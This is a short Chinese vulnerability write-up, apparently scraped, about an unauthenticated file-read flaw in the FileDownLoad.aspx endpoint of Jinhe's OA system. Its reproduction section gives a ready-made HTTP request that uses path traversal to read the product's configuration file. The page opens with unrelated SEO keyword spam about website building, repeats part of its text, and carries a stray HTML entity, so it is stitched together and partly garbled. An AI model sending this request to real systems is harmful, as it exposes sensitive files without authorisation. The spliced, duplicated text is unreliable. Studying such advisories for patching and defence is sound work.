电影网站备案,学校网站建设主体,可能wordpress.org或服务器配置文件存在问题,整容医院网络建设公司文章目录 免责声明漏洞描述漏洞原理影响版本漏洞复现修复建议 免责声明
没有网络安全就没有国家安全#xff0c;该文章只为学习和交流#xff0c;利用做违法乱纪的事#xff0c;与本人无关
漏洞描述
金和网络是专业信息化服务商,为城市监管部门提供了互联网监管解决方案,… 文章目录 免责声明漏洞描述漏洞原理影响版本漏洞复现修复建议 免责声明
没有网络安全就没有国家安全该文章只为学习和交流利用做违法乱纪的事与本人无关
漏洞描述
金和网络是专业信息化服务商,为城市监管部门提供了互联网监管解决方案,为企事业单位提供组织协同
漏洞原理
在FileDownLoad.aspx接口存在文件读取的漏洞未经授权攻击者可以用过调用该接口获取系统的敏感信息
影响版本
最新版本
漏洞复现
构造请求包
GET /c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath../Resource/JHFileConfig.ini HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Connection: close发送请求包
修复建议
更新到最新版本
